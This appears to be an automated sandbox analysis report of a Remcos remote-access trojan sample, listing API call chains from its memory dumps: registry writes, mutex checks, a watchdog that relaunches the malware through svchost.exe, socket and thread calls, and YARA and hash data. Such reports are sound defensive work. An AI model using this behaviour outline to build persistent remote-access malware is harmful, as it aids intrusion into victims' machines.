                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                                                                • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                                                                  • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024FF
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                                                                • atoi.MSVCRT ref: 00404B88
                                                                                  • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                                                                  • Part of subcall function 00404EA7: #3.WS2_32(?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404EEE
                                                                                  • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                                                                • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                                                                • atoi.MSVCRT ref: 00404BE5
                                                                                • FindClose.KERNEL32(?), ref: 00404BF6
                                                                                • ExitThread.KERNEL32 ref: 00404BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoi$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 1578901561-0
                                                                                • Opcode ID: f6688f26f3f57a56693712141f2b566ff735a31b20a2d6653c0cb94a94c5575e
                                                                                • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                                                                • Opcode Fuzzy Hash: f6688f26f3f57a56693712141f2b566ff735a31b20a2d6653c0cb94a94c5575e
                                                                                • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                                                                  • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                                                                  • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                                                                  • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                                                                • OpenMutexA.KERNEL32 ref: 0040A63B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                                                                  • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                  • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                  • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                                                                  • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                                                                  • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                                                                • _wgetenv.MSVCRT ref: 0040A7B3
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                                                                • _wgetenv.MSVCRT ref: 0040A758
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                                                                • CloseHandle.KERNEL32 ref: 0040A8AA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                                                                • API String ID: 2208868093-2207663338
                                                                                • Opcode ID: 977de623e605ecd14905f26ffc4c76dc8fb51f8bb2026068cf0d3d1f23cc7adf
                                                                                • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                                                                • Opcode Fuzzy Hash: 977de623e605ecd14905f26ffc4c76dc8fb51f8bb2026068cf0d3d1f23cc7adf
                                                                                • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 004105AD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
